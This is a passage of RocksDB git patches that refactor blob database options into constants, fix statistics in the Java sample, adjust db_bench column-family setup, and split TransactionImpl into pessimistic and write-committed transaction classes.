((bfile->deleted_size_ * 100.0 / bfile->file_size_.load()) > - bdb_options_.partial_expiration_pct) { + kPartialExpirationPercentage) { *reason = "deleted simple blobs beyond threshold"; return true; } // if we haven't reached limits of disk space, don't DELETE - if (total_blob_space_.load() < bdb_options_.blob_dir_size) { + if (bdb_options_.blob_dir_size == 0 || + total_blob_space_.load() < bdb_options_.blob_dir_size) { *reason = "disk space not exceeded"; return false; } @@ -2057,7 +2046,7 @@ void BlobDBImpl::FilterSubsetOfFiles( uint64_t last_id, size_t files_to_collect) { // 100.0 / 15.0 = 7 uint64_t next_epoch_increment = static_cast( - std::ceil(100 / static_cast(bdb_options_.gc_file_pct))); + std::ceil(100 / static_cast(kGCFilePercentage))); std::chrono::system_clock::time_point now = std::chrono::system_clock::now(); std::time_t tt = std::chrono::system_clock::to_time_t(now); @@ -2114,8 +2103,7 @@ std::pair BlobDBImpl::RunGC(bool aborted) { // 15% of files are collected each call to space out the IO and CPU // consumption. - size_t files_to_collect = - (bdb_options_.gc_file_pct * blob_files.size()) / 100; + size_t files_to_collect = (kGCFilePercentage * blob_files.size()) / 100; std::vector> to_process; FilterSubsetOfFiles(blob_files, &to_process, current_epoch_, last_id, diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index 8da5bbf6529..95a387afe37 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -29,7 +29,6 @@ #include "util/mutexlock.h" #include "util/timer_queue.h" #include "utilities/blob_db/blob_db.h" -#include "utilities/blob_db/blob_db_options_impl.h" #include "utilities/blob_db/blob_log_format.h" #include "utilities/blob_db/blob_log_reader.h" #include "utilities/blob_db/blob_log_writer.h" @@ -158,6 +157,51 @@ class BlobDBImpl : public BlobDB { friend class BlobDBIterator; public: + // deletions check period + static constexpr uint32_t kDeleteCheckPeriodMillisecs = 2 * 1000; + + // gc percentage each check period + static constexpr uint32_t kGCFilePercentage = 100; + + // gc period + static constexpr uint32_t kGCCheckPeriodMillisecs = 60 * 1000; + + // sanity check task + static constexpr uint32_t kSanityCheckPeriodMillisecs = 20 * 60 * 1000; + + // how many random access open files can we tolerate + static constexpr uint32_t kOpenFilesTrigger = 100; + + // how many periods of stats do we keep. + static constexpr uint32_t kWriteAmplificationStatsPeriods = 24; + + // what is the length of any period + static constexpr uint32_t kWriteAmplificationStatsPeriodMillisecs = + 3600 * 1000; + + // we will garbage collect blob files in + // which entire files have expired. However if the + // ttl_range of files is very large say a day, we + // would have to wait for the entire day, before we + // recover most of the space. + static constexpr uint32_t kPartialExpirationGCRangeSecs = 4 * 3600; + + // this should be based on allowed Write Amplification + // if 50% of the space of a blob file has been deleted/expired, + static constexpr uint32_t kPartialExpirationPercentage = 75; + + // how often should we schedule a job to fsync open files + static constexpr uint32_t kFSyncFilesPeriodMillisecs = 10 * 1000; + + // how often to schedule reclaim open files. + static constexpr uint32_t kReclaimOpenFilesPeriodMillisecs = 1 * 1000; + + // how often to schedule delete obs files periods + static constexpr uint32_t kDeleteObsoletedFilesPeriodMillisecs = 10 * 1000; + + // how often to schedule check seq files period + static constexpr uint32_t kCheckSeqFilesPeriodMillisecs = 10 * 1000; + static constexpr uint64_t kNoExpiration = std::numeric_limits::max(); @@ -383,7 +427,7 @@ class BlobDBImpl : public BlobDB { WriteOptions write_options_; // the options that govern the behavior of Blob Storage - BlobDBOptionsImpl bdb_options_; + BlobDBOptions bdb_options_; DBOptions db_options_; EnvOptions env_options_; diff --git a/utilities/blob_db/blob_db_options_impl.cc b/utilities/blob_db/blob_db_options_impl.cc deleted file mode 100644 index 263213d8e34..00000000000 --- a/utilities/blob_db/blob_db_options_impl.cc +++ /dev/null @@ -1,69 +0,0 @@ -// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under both the GPLv2 (found in the -// COPYING file in the root directory) and Apache 2.0 License -// (found in the LICENSE.Apache file in the root directory). -#ifndef ROCKSDB_LITE - -#include "utilities/blob_db/blob_db_options_impl.h" - -namespace rocksdb { - -namespace blob_db { - -BlobDBOptionsImpl::BlobDBOptionsImpl(const BlobDBOptions& in) - : BlobDBOptions(in), - deletion_check_period_millisecs(2 * 1000), - gc_file_pct(20), - gc_check_period_millisecs(60 * 1000), - sanity_check_period_millisecs(20 * 60 * 1000), - open_files_trigger(100), - wa_num_stats_periods(24), - wa_stats_period_millisecs(3600 * 1000), - partial_expiration_gc_range_secs(4 * 3600), - partial_expiration_pct(75), - fsync_files_period_millisecs(10 * 1000), - reclaim_of_period_millisecs(1 * 1000), - delete_obsf_period_millisecs(10 * 1000), - check_seqf_period_millisecs(10 * 1000), - disable_background_tasks(false) {} - -BlobDBOptionsImpl::BlobDBOptionsImpl() - : deletion_check_period_millisecs(2 * 1000), - gc_file_pct(20), - gc_check_period_millisecs(60 * 1000), - sanity_check_period_millisecs(20 * 60 * 1000), - open_files_trigger(100), - wa_num_stats_periods(24), - wa_stats_period_millisecs(3600 * 1000), - partial_expiration_gc_range_secs(4 * 3600), - partial_expiration_pct(75), - fsync_files_period_millisecs(10 * 1000), - reclaim_of_period_millisecs(1 * 1000), - delete_obsf_period_millisecs(10 * 1000), - check_seqf_period_millisecs(10 * 1000), - disable_background_tasks(false) {} - -BlobDBOptionsImpl& BlobDBOptionsImpl::operator=(const BlobDBOptionsImpl& in) { - BlobDBOptions::operator=(in); - if (this != &in) { - deletion_check_period_millisecs = in.deletion_check_period_millisecs; - gc_file_pct = in.gc_file_pct; - gc_check_period_millisecs = in.gc_check_period_millisecs; - sanity_check_period_millisecs = in.sanity_check_period_millisecs; - open_files_trigger = in.open_files_trigger; - wa_num_stats_periods = in.wa_num_stats_periods; - wa_stats_period_millisecs = in.wa_stats_period_millisecs; - partial_expiration_gc_range_secs = in.partial_expiration_gc_range_secs; - partial_expiration_pct = in.partial_expiration_pct; - fsync_files_period_millisecs = in.fsync_files_period_millisecs; - reclaim_of_period_millisecs = in.reclaim_of_period_millisecs; - delete_obsf_period_millisecs = in.delete_obsf_period_millisecs; - check_seqf_period_millisecs = in.check_seqf_period_millisecs; - disable_background_tasks = in.disable_background_tasks; - } - return *this; -} - -} // namespace blob_db -} // namespace rocksdb -#endif // ROCKSDB_LITE diff --git a/utilities/blob_db/blob_db_options_impl.h b/utilities/blob_db/blob_db_options_impl.h deleted file mode 100644 index 0ee0aa92005..00000000000 --- a/utilities/blob_db/blob_db_options_impl.h +++ /dev/null @@ -1,76 +0,0 @@ -// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under both the GPLv2 (found in the -// COPYING file in the root directory) and Apache 2.0 License -// (found in the LICENSE.Apache file in the root directory). - -#pragma once - -#ifndef ROCKSDB_LITE - -#include "utilities/blob_db/blob_db.h" - -namespace rocksdb { - -namespace blob_db { - -struct BlobDBOptionsImpl : public BlobDBOptions { - // deletions check period - uint32_t deletion_check_period_millisecs; - - // gc percentage each check period - uint32_t gc_file_pct; - - // gc period - uint32_t gc_check_period_millisecs; - - // sanity check task - uint32_t sanity_check_period_millisecs; - - // how many random access open files can we tolerate - uint32_t open_files_trigger; - - // how many periods of stats do we keep. - uint32_t wa_num_stats_periods; - - // what is the length of any period - uint32_t wa_stats_period_millisecs; - - // we will garbage collect blob files in - // which entire files have expired. However if the - // ttl_range of files is very large say a day, we - // would have to wait for the entire day, before we - // recover most of the space. - uint32_t partial_expiration_gc_range_secs; - - // this should be based on allowed Write Amplification - // if 50% of the space of a blob file has been deleted/expired, - uint32_t partial_expiration_pct; - - // how often should we schedule a job to fsync open files - uint32_t fsync_files_period_millisecs; - - // how often to schedule reclaim open files. - uint32_t reclaim_of_period_millisecs; - - // how often to schedule delete obs files periods - uint32_t delete_obsf_period_millisecs; - - // how often to schedule check seq files period - uint32_t check_seqf_period_millisecs; - - // Disable all background job. - bool disable_background_tasks; - - // default constructor - BlobDBOptionsImpl(); - - explicit BlobDBOptionsImpl(const BlobDBOptions& in); - - BlobDBOptionsImpl& operator=(const BlobDBOptionsImpl& in); -}; - -} // namespace blob_db - -} // namespace rocksdb - -#endif // endif ROCKSDB diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 6a43f6b77e9..a5f9795929f 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -16,7 +16,6 @@ #include "util/string_util.h" #include "util/testharness.h" #include "utilities/blob_db/blob_db_impl.h" -#include "utilities/blob_db/blob_db_options_impl.h" namespace rocksdb { namespace blob_db { @@ -47,7 +46,7 @@ class BlobDBTest : public testing::Test { ~BlobDBTest() { Destroy(); } - void Open(BlobDBOptionsImpl bdb_options = BlobDBOptionsImpl(), + void Open(BlobDBOptions bdb_options = BlobDBOptions(), Options options = Options()) { options.create_if_missing = true; ASSERT_OK(BlobDB::Open(options, bdb_options, dbname_, &blob_db_)); @@ -153,7 +152,7 @@ class BlobDBTest : public testing::Test { TEST_F(BlobDBTest, Put) { Random rnd(301); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -167,7 +166,7 @@ TEST_F(BlobDBTest, PutWithTTL) { Random rnd(301); Options options; options.env = mock_env_.get(); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.disable_background_tasks = true; @@ -196,7 +195,7 @@ TEST_F(BlobDBTest, PutUntil) { Random rnd(301); Options options; options.env = mock_env_.get(); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.disable_background_tasks = true; @@ -227,7 +226,7 @@ TEST_F(BlobDBTest, TTLExtrator_NoTTL) { Random rnd(301); Options options; options.env = mock_env_.get(); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.num_concurrent_simple_blobs = 1; @@ -275,7 +274,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractTTL) { ttl_extractor_.reset(new TestTTLExtractor(&rnd)); Options options; options.env = mock_env_.get(); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.ttl_extractor = ttl_extractor_; @@ -322,7 +321,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractExpiration) { ttl_extractor_.reset(new TestTTLExtractor(&rnd)); Options options; options.env = mock_env_.get(); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.ttl_extractor = ttl_extractor_; @@ -369,7 +368,7 @@ TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { Random rnd(301); Options options; options.env = mock_env_.get(); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.ttl_extractor = std::make_shared(); @@ -404,7 +403,7 @@ TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { TEST_F(BlobDBTest, StackableDBGet) { Random rnd(301); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -426,7 +425,7 @@ TEST_F(BlobDBTest, StackableDBGet) { TEST_F(BlobDBTest, WriteBatch) { Random rnd(301); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -442,7 +441,7 @@ TEST_F(BlobDBTest, WriteBatch) { TEST_F(BlobDBTest, Delete) { Random rnd(301); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -457,7 +456,7 @@ TEST_F(BlobDBTest, Delete) { TEST_F(BlobDBTest, DeleteBatch) { Random rnd(301); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; Open(bdb_options); for (size_t i = 0; i < 100; i++) { @@ -474,7 +473,7 @@ TEST_F(BlobDBTest, DeleteBatch) { TEST_F(BlobDBTest, Override) { Random rnd(301); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -491,7 +490,7 @@ TEST_F(BlobDBTest, Override) { #ifdef SNAPPY TEST_F(BlobDBTest, Compression) { Random rnd(301); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; bdb_options.compression = CompressionType::kSnappyCompression; Open(bdb_options); @@ -528,7 +527,7 @@ TEST_F(BlobDBTest, DISABLED_MultipleWriters) { // Test sequence number store in blob file is correct. TEST_F(BlobDBTest, SequenceNumber) { Random rnd(301); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; Open(bdb_options); SequenceNumber sequence = blob_db_->GetLatestSequenceNumber(); From 3453870677ee2648f38d70fe8aa7fa16a93a96d2 Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Tue, 1 Aug 2017 16:42:42 -0700 Subject: [PATCH 067/205] Fix statistics in RocksJava sample Summary: I observed while doing a `make jtest` that the java sample was broken, due to the changes in #2551 . Closes https://github.com/facebook/rocksdb/pull/2674 Differential Revision: D5539807 Pulled By: sagar0 fbshipit-source-id: 2c7e9d84778099dfa1c611996b444efe3c9fd466 --- java/samples/src/main/java/RocksDBSample.java | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/java/samples/src/main/java/RocksDBSample.java b/java/samples/src/main/java/RocksDBSample.java index b1f9805553d..f61995ed98f 100644 --- a/java/samples/src/main/java/RocksDBSample.java +++ b/java/samples/src/main/java/RocksDBSample.java @@ -31,6 +31,7 @@ public static void main(final String[] args) { final Filter bloomFilter = new BloomFilter(10); final ReadOptions readOptions = new ReadOptions() .setFillCache(false); + final Statistics stats = new Statistics(); final RateLimiter rateLimiter = new RateLimiter(10000000,10000, 10)) { try (final RocksDB db = RocksDB.open(options, db_path_not_found)) { @@ -41,7 +42,7 @@ public static void main(final String[] args) { try { options.setCreateIfMissing(true) - .createStatistics() + .setStatistics(stats) .setWriteBufferSize(8 * SizeUnit.KB) .setMaxWriteBufferNumber(3) .setMaxBackgroundCompactions(10) @@ -51,8 +52,6 @@ public static void main(final String[] args) { assert (false); } - final Statistics stats = options.statisticsPtr(); - assert (options.createIfMissing() == true); assert (options.writeBufferSize() == 8 * SizeUnit.KB); assert (options.maxWriteBufferNumber() == 3); @@ -221,7 +220,9 @@ public static void main(final String[] args) { try { for (final TickerType statsType : TickerType.values()) { - stats.getTickerCount(statsType); + if (statsType != TickerType.TICKER_ENUM_MAX) { + stats.getTickerCount(statsType); + } } System.out.println("getTickerCount() passed."); } catch (final Exception e) { @@ -231,7 +232,9 @@ public static void main(final String[] args) { try { for (final HistogramType histogramType : HistogramType.values()) { - HistogramData data = stats.getHistogramData(histogramType); + if (histogramType != HistogramType.HISTOGRAM_ENUM_MAX) { + HistogramData data = stats.getHistogramData(histogramType); + } } System.out.println("getHistogramData() passed."); } catch (final Exception e) { From 060ccd4f84e4b266dffd3fd9e38423270fb9b422 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Wed, 2 Aug 2017 16:13:08 -0700 Subject: [PATCH 068/205] support multiple CFs with OPTIONS file Summary: Move an option necessary for running db_bench on multiple CFs into the general initialization area, so it works with both flag-based init and OPTIONS-based init. Closes https://github.com/facebook/rocksdb/pull/2675 Differential Revision: D5541378 Pulled By: ajkr fbshipit-source-id: 169926cb4ae95c17974f744faf7cc794d41e5c0a --- tools/db_bench_tool.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc index 8f3ae353684..f0221625947 100644 --- a/tools/db_bench_tool.cc +++ b/tools/db_bench_tool.cc @@ -2856,7 +2856,6 @@ void VerifyDBFromDB(std::string& truth_db_name) { assert(db_.db == nullptr); - options.create_missing_column_families = FLAGS_num_column_families > 1; options.max_open_files = FLAGS_open_files; if (FLAGS_cost_write_buffer_to_cache || FLAGS_db_write_buffer_size != 0) { options.write_buffer_manager.reset( @@ -3203,6 +3202,7 @@ void VerifyDBFromDB(std::string& truth_db_name) { void InitializeOptionsGeneral(Options* opts) { Options& options = *opts; + options.create_missing_column_families = FLAGS_num_column_families > 1; options.statistics = dbstats; options.wal_dir = FLAGS_wal_dir; options.create_if_missing = !FLAGS_use_existing_db; From c3d5c4d38ab65e9aef713a029cb166b194b960f2 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Thu, 3 Aug 2017 08:46:47 -0700 Subject: [PATCH 069/205] Refactor TransactionImpl Summary: This patch refactors TransactionImpl by separating the logic for pessimistic concurrency control from the implementation of how to write the data to rocksdb. The existing implementation is named WriteCommittedTxnImpl as it writes committed data to the db. A template named WritePreparedTxnImpl is also added which will be later completed to provide a an alternative implementation. Closes https://github.com/facebook/rocksdb/pull/2676 Differential Revision: D5549998 Pulled By: maysamyabandeh fbshipit-source-id: 16298e86b43ca4849324c1f35c731913c6d17bec --- CMakeLists.txt | 1 + db/db_impl.h | 4 +- src.mk | 1 + utilities/transactions/transaction_db_impl.cc | 16 ++-- utilities/transactions/transaction_db_impl.h | 11 ++- utilities/transactions/transaction_impl.cc | 75 +++++++++--------- utilities/transactions/transaction_impl.h | 76 ++++++++++++------- .../transactions/transaction_lock_mgr.cc | 16 ++-- utilities/transactions/transaction_lock_mgr.h | 16 ++-- .../write_prepared_transaction_impl.cc | 65 ++++++++++++++++ .../write_prepared_transaction_impl.h | 70 +++++++++++++++++ 11 files changed, 258 insertions(+), 93 deletions(-) create mode 100644 utilities/transactions/write_prepared_transaction_impl.cc create mode 100644 utilities/transactions/write_prepared_transaction_impl.h diff --git a/CMakeLists.txt b/CMakeLists.txt index bc8eb5d6152..bd7a8fbe45f 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -525,6 +525,7 @@ set(SOURCES utilities/transactions/transaction_impl.cc utilities/transactions/transaction_lock_mgr.cc utilities/transactions/transaction_util.cc + utilities/transactions/write_prepared_transaction_impl.cc utilities/ttl/db_ttl_impl.cc utilities/write_batch_with_index/write_batch_with_index.cc utilities/write_batch_with_index/write_batch_with_index_internal.cc diff --git a/db/db_impl.h b/db/db_impl.h index 7fec69cd732..3284048a688 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -631,7 +631,9 @@ class DBImpl : public DB { private: friend class DB; friend class InternalStats; - friend class TransactionImpl; + friend class PessimisticTxn; + friend class WriteCommittedTxnImpl; + friend class WritePreparedTxnImpl; #ifndef ROCKSDB_LITE friend class ForwardIterator; #endif diff --git a/src.mk b/src.mk index 81d78eb36fb..0b0d4e6ab51 100644 --- a/src.mk +++ b/src.mk @@ -200,6 +200,7 @@ LIB_SOURCES = \ utilities/transactions/transaction_impl.cc \ utilities/transactions/transaction_lock_mgr.cc \ utilities/transactions/transaction_util.cc \ + utilities/transactions/write_prepared_transaction_impl.cc \ utilities/ttl/db_ttl_impl.cc \ utilities/write_batch_with_index/write_batch_with_index.cc \ utilities/write_batch_with_index/write_batch_with_index_internal.cc \ diff --git a/utilities/transactions/transaction_db_impl.cc b/utilities/transactions/transaction_db_impl.cc index 69b5bc1ea0f..bd43b585ac6 100644 --- a/utilities/transactions/transaction_db_impl.cc +++ b/utilities/transactions/transaction_db_impl.cc @@ -128,7 +128,7 @@ Transaction* TransactionDBImpl::BeginTransaction( ReinitializeTransaction(old_txn, write_options, txn_options); return old_txn; } else { - return new TransactionImpl(this, write_options, txn_options); + return new WriteCommittedTxnImpl(this, write_options, txn_options); } } @@ -266,17 +266,17 @@ Status TransactionDBImpl::DropColumnFamily(ColumnFamilyHandle* column_family) { return s; } -Status TransactionDBImpl::TryLock(TransactionImpl* txn, uint32_t cfh_id, +Status TransactionDBImpl::TryLock(PessimisticTxn* txn, uint32_t cfh_id, const std::string& key, bool exclusive) { return lock_mgr_.TryLock(txn, cfh_id, key, GetEnv(), exclusive); } -void TransactionDBImpl::UnLock(TransactionImpl* txn, +void TransactionDBImpl::UnLock(PessimisticTxn* txn, const TransactionKeyMap* keys) { lock_mgr_.UnLock(txn, keys, GetEnv()); } -void TransactionDBImpl::UnLock(TransactionImpl* txn, uint32_t cfh_id, +void TransactionDBImpl::UnLock(PessimisticTxn* txn, uint32_t cfh_id, const std::string& key) { lock_mgr_.UnLock(txn, cfh_id, key, GetEnv()); } @@ -372,7 +372,7 @@ Status TransactionDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { Transaction* txn = BeginInternalTransaction(opts); txn->DisableIndexing(); - auto txn_impl = static_cast_with_check(txn); + auto txn_impl = static_cast_with_check(txn); // Since commitBatch sorts the keys before locking, concurrent Write() // operations will not cause a deadlock. @@ -386,7 +386,7 @@ Status TransactionDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { } void TransactionDBImpl::InsertExpirableTransaction(TransactionID tx_id, - TransactionImpl* tx) { + PessimisticTxn* tx) { assert(tx->GetExpirationTime() > 0); std::lock_guard lock(map_mutex_); expirable_transactions_map_.insert({tx_id, tx}); @@ -405,14 +405,14 @@ bool TransactionDBImpl::TryStealingExpiredTransactionLocks( if (tx_it == expirable_transactions_map_.end()) { return true; } - TransactionImpl& tx = *(tx_it->second); + PessimisticTxn& tx = *(tx_it->second); return tx.TryStealingLocks(); } void TransactionDBImpl::ReinitializeTransaction( Transaction* txn, const WriteOptions& write_options, const TransactionOptions& txn_options) { - auto txn_impl = static_cast_with_check(txn); + auto txn_impl = static_cast_with_check(txn); txn_impl->Reinitialize(this, write_options, txn_options); } diff --git a/utilities/transactions/transaction_db_impl.h b/utilities/transactions/transaction_db_impl.h index 428512e8246..dfc13fbd707 100644 --- a/utilities/transactions/transaction_db_impl.h +++ b/utilities/transactions/transaction_db_impl.h @@ -63,11 +63,11 @@ class TransactionDBImpl : public TransactionDB { using StackableDB::DropColumnFamily; virtual Status DropColumnFamily(ColumnFamilyHandle* column_family) override; - Status TryLock(TransactionImpl* txn, uint32_t cfh_id, const std::string& key, + Status TryLock(PessimisticTxn* txn, uint32_t cfh_id, const std::string& key, bool exclusive); - void UnLock(TransactionImpl* txn, const TransactionKeyMap* keys); - void UnLock(TransactionImpl* txn, uint32_t cfh_id, const std::string& key); + void UnLock(PessimisticTxn* txn, const TransactionKeyMap* keys); + void UnLock(PessimisticTxn* txn, uint32_t cfh_id, const std::string& key); void AddColumnFamily(const ColumnFamilyHandle* handle); @@ -78,7 +78,7 @@ class TransactionDBImpl : public TransactionDB { return txn_db_options_; } - void InsertExpirableTransaction(TransactionID tx_id, TransactionImpl* tx); + void InsertExpirableTransaction(TransactionID tx_id, PessimisticTxn* tx); void RemoveExpirableTransaction(TransactionID tx_id); // If transaction is no longer available, locks can be stolen @@ -109,13 +109,12 @@ class TransactionDBImpl : public TransactionDB { // Must be held when adding/dropping column families. InstrumentedMutex column_family_mutex_; Transaction* BeginInternalTransaction(const WriteOptions& options); - Status WriteHelper(WriteBatch* updates, TransactionImpl* txn_impl); // Used to ensure that no locks are stolen from an expirable transaction // that has started a commit. Only transactions with an expiration time // should be in this map. std::mutex map_mutex_; - std::unordered_map + std::unordered_map expirable_transactions_map_; // map from name to two phase transaction instance diff --git a/utilities/transactions/transaction_impl.cc b/utilities/transactions/transaction_impl.cc index dd0c69be48b..ececec6d534 100644 --- a/utilities/transactions/transaction_impl.cc +++ b/utilities/transactions/transaction_impl.cc @@ -29,31 +29,31 @@ namespace rocksdb { struct WriteOptions; -std::atomic TransactionImpl::txn_id_counter_(1); +std::atomic PessimisticTxn::txn_id_counter_(1); -TransactionID TransactionImpl::GenTxnID() { +TransactionID PessimisticTxn::GenTxnID() { return txn_id_counter_.fetch_add(1); } -TransactionImpl::TransactionImpl(TransactionDB* txn_db, - const WriteOptions& write_options, - const TransactionOptions& txn_options) +PessimisticTxn::PessimisticTxn(TransactionDB* txn_db, + const WriteOptions& write_options, + const TransactionOptions& txn_options) : TransactionBaseImpl(txn_db->GetRootDB(), write_options), txn_db_impl_(nullptr), + expiration_time_(0), txn_id_(0), waiting_cf_id_(0), waiting_key_(nullptr), - expiration_time_(0), lock_timeout_(0), deadlock_detect_(false), deadlock_detect_depth_(0) { txn_db_impl_ = static_cast_with_check(txn_db); - db_impl_ = static_cast_with_check(txn_db->GetRootDB()); + db_impl_ = static_cast_with_check(db_); Initialize(txn_options); } -void TransactionImpl::Initialize(const TransactionOptions& txn_options) { +void PessimisticTxn::Initialize(const TransactionOptions& txn_options) { txn_id_ = GenTxnID(); txn_state_ = STARTED; @@ -84,7 +84,7 @@ void TransactionImpl::Initialize(const TransactionOptions& txn_options) { } } -TransactionImpl::~TransactionImpl() { +PessimisticTxn::~PessimisticTxn() { txn_db_impl_->UnLock(this, &GetTrackedKeys()); if (expiration_time_ > 0) { txn_db_impl_->RemoveExpirableTransaction(txn_id_); @@ -94,14 +94,14 @@ TransactionImpl::~TransactionImpl() { } } -void TransactionImpl::Clear() { +void PessimisticTxn::Clear() { txn_db_impl_->UnLock(this, &GetTrackedKeys()); TransactionBaseImpl::Clear(); } -void TransactionImpl::Reinitialize(TransactionDB* txn_db, - const WriteOptions& write_options, - const TransactionOptions& txn_options) { +void PessimisticTxn::Reinitialize(TransactionDB* txn_db, + const WriteOptions& write_options, + const TransactionOptions& txn_options) { if (!name_.empty() && txn_state_ != COMMITED) { txn_db_impl_->UnregisterTransaction(this); } @@ -109,7 +109,7 @@ void TransactionImpl::Reinitialize(TransactionDB* txn_db, Initialize(txn_options); } -bool TransactionImpl::IsExpired() const { +bool PessimisticTxn::IsExpired() const { if (expiration_time_ > 0) { if (db_->GetEnv()->NowMicros() >= expiration_time_) { // Transaction is expired. @@ -120,7 +120,12 @@ bool TransactionImpl::IsExpired() const { return false; } -Status TransactionImpl::CommitBatch(WriteBatch* batch) { +WriteCommittedTxnImpl::WriteCommittedTxnImpl( + TransactionDB* txn_db, const WriteOptions& write_options, + const TransactionOptions& txn_options) + : PessimisticTxn(txn_db, write_options, txn_options){}; + +Status WriteCommittedTxnImpl::CommitBatch(WriteBatch* batch) { TransactionKeyMap keys_to_unlock; Status s = LockBatch(batch, &keys_to_unlock); @@ -158,7 +163,7 @@ Status TransactionImpl::CommitBatch(WriteBatch* batch) { return s; } -Status TransactionImpl::Prepare() { +Status WriteCommittedTxnImpl::Prepare() { Status s; if (name_.empty()) { @@ -213,7 +218,7 @@ Status TransactionImpl::Prepare() { return s; } -Status TransactionImpl::Commit() { +Status WriteCommittedTxnImpl::Commit() { Status s; bool commit_single = false; bool commit_prepared = false; @@ -299,7 +304,7 @@ Status TransactionImpl::Commit() { return s; } -Status TransactionImpl::Rollback() { +Status WriteCommittedTxnImpl::Rollback() { Status s; if (txn_state_ == PREPARED) { WriteBatch rollback_marker; @@ -326,7 +331,7 @@ Status TransactionImpl::Rollback() { return s; } -Status TransactionImpl::RollbackToSavePoint() { +Status PessimisticTxn::RollbackToSavePoint() { if (txn_state_ != STARTED) { return Status::InvalidArgument("Transaction is beyond state for rollback."); } @@ -344,8 +349,8 @@ Status TransactionImpl::RollbackToSavePoint() { // Lock all keys in this batch. // On success, caller should unlock keys_to_unlock -Status TransactionImpl::LockBatch(WriteBatch* batch, - TransactionKeyMap* keys_to_unlock) { +Status PessimisticTxn::LockBatch(WriteBatch* batch, + TransactionKeyMap* keys_to_unlock) { class Handler : public WriteBatch::Handler { public: // Sorted map of column_family_id to sorted set of keys. @@ -422,9 +427,9 @@ Status TransactionImpl::LockBatch(WriteBatch* batch, // If check_shapshot is true and this transaction has a snapshot set, // this key will only be locked if there have been no writes to this key since // the snapshot time. -Status TransactionImpl::TryLock(ColumnFamilyHandle* column_family, - const Slice& key, bool read_only, - bool exclusive, bool untracked) { +Status PessimisticTxn::TryLock(ColumnFamilyHandle* column_family, + const Slice& key, bool read_only, bool exclusive, + bool untracked) { uint32_t cfh_id = GetColumnFamilyID(column_family); std::string key_str = key.ToString(); bool previously_locked; @@ -510,10 +515,10 @@ Status TransactionImpl::TryLock(ColumnFamilyHandle* column_family, // Return OK() if this key has not been modified more recently than the // transaction snapshot_. -Status TransactionImpl::ValidateSnapshot(ColumnFamilyHandle* column_family, - const Slice& key, - SequenceNumber prev_seqno, - SequenceNumber* new_seqno) { +Status PessimisticTxn::ValidateSnapshot(ColumnFamilyHandle* column_family, + const Slice& key, + SequenceNumber prev_seqno, + SequenceNumber* new_seqno) { assert(snapshot_); SequenceNumber seq = snapshot_->GetSequenceNumber(); @@ -526,29 +531,27 @@ Status TransactionImpl::ValidateSnapshot(ColumnFamilyHandle* column_family, *new_seqno = seq; - auto db_impl = static_cast_with_check(db_); - ColumnFamilyHandle* cfh = - column_family ? column_family : db_impl->DefaultColumnFamily(); + column_family ? column_family : db_impl_->DefaultColumnFamily(); - return TransactionUtil::CheckKeyForConflicts(db_impl, cfh, key.ToString(), + return TransactionUtil::CheckKeyForConflicts(db_impl_, cfh, key.ToString(), snapshot_->GetSequenceNumber(), false /* cache_only */); } -bool TransactionImpl::TryStealingLocks() { +bool PessimisticTxn::TryStealingLocks() { assert(IsExpired()); TransactionState expected = STARTED; return std::atomic_compare_exchange_strong(&txn_state_, &expected, LOCKS_STOLEN); } -void TransactionImpl::UnlockGetForUpdate(ColumnFamilyHandle* column_family, - const Slice& key) { +void 